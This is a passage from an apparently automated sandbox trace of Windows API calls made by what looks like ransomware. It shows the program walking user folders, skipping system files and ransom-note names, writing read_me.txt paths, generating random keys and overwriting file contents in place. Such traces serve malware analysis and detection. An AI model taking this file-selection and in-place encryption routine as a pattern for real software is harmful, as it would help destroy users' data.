| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0076.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0076.146] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.") returned 41 [0076.146] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.146] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\..") returned 42 [0076.146] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.146] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0076.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x920 [0076.146] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.146] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.146] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.146] CloseHandle (hObject=0x920) returned 1 [0076.146] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0076.146] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0076.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x924 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="read_me.txt") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="autoexec.bat") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="desktop.ini") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="autorun.inf") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="iconcache.db") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="bootsect.bak") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="boot.ini") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0076.151] StrStrW (lpFirst="desktop.lnk", lpSrch="thumbs.db") returned 0x0 [0076.151] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 105 [0076.151] QueueUserWorkItem (Function=0x404e00, Context=0x924, Flags=0x0) returned 1 [0076.151] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0076.151] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0076.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x928 [0076.151] StrStrW (lpFirst="downloads.lnk", lpSrch="read_me.txt") returned 0x0 [0076.151] StrStrW (lpFirst="downloads.lnk", lpSrch="autoexec.bat") returned 0x0 [0076.151] StrStrW (lpFirst="downloads.lnk", lpSrch="desktop.ini") returned 0x0 [0076.151] StrStrW (lpFirst="downloads.lnk", lpSrch="autorun.inf") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="iconcache.db") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="bootsect.bak") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="boot.ini") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0076.152] StrStrW (lpFirst="downloads.lnk", lpSrch="thumbs.db") returned 0x0 [0076.152] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 106 [0076.152] QueueUserWorkItem (Function=0x404e00, Context=0x928, Flags=0x0) returned 1 [0076.152] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24acf9e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.152] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt") returned 51 [0076.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x92c [0076.152] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.152] CloseHandle (hObject=0x92c) returned 1 [0076.152] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0076.152] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0076.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x934 [0076.155] StrStrW (lpFirst="recentplaces.lnk", lpSrch="read_me.txt") returned 0x0 [0076.155] StrStrW (lpFirst="recentplaces.lnk", lpSrch="autoexec.bat") returned 0x0 [0076.155] StrStrW (lpFirst="recentplaces.lnk", lpSrch="desktop.ini") returned 0x0 [0076.155] StrStrW (lpFirst="recentplaces.lnk", lpSrch="autorun.inf") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="ntuser.dat") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="iconcache.db") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="bootsect.bak") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="boot.ini") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0076.156] StrStrW (lpFirst="recentplaces.lnk", lpSrch="thumbs.db") returned 0x0 [0076.156] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 108 [0076.156] QueueUserWorkItem (Function=0x404e00, Context=0x934, Flags=0x0) returned 1 [0076.156] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="recentplaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0076.156] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0076.156] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt") returned 51 [0076.156] GetProcessHeap () returned 0x4f10000 [0076.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600b8 | out: hHeap=0x4f10000) returned 1 [0076.156] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 64 [0076.156] GetProcessHeap () returned 0x4f10000 [0076.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c80048 | out: hHeap=0x4f10000) returned 1 [0076.166] GetProcessHeap () returned 0x4f10000 [0076.166] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0076.166] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*") returned 50 [0076.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="recentplaces.lnk", cAlternateFileName="")) returned 0xffffffff [0076.166] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\read_me.txt") returned 60 [0076.166] GetProcessHeap () returned 0x4f10000 [0076.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0076.166] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 65 [0076.166] GetProcessHeap () returned 0x4f10000 [0076.166] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cc1070 | out: hHeap=0x4f10000) returned 1 [0076.261] SetFilePointerEx (in: hFile=0x7b4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.261] ReadFile (in: hFile=0x7b4, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.261] SetFilePointerEx (in: hFile=0x7b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.261] GetProcessHeap () returned 0x4f10000 [0076.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.261] GetProcessHeap () returned 0x4f10000 [0076.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.262] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.262] GetProcessHeap () returned 0x4f10000 [0076.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.262] ReadFile (in: hFile=0x7b4, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.355] SetFilePointerEx (in: hFile=0x7b4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.355] WriteFile (in: hFile=0x7b4, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.356] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.356] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.357] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.357] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.358] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.358] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.359] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.359] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.360] GetProcessHeap () returned 0x4f10000 [0076.360] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 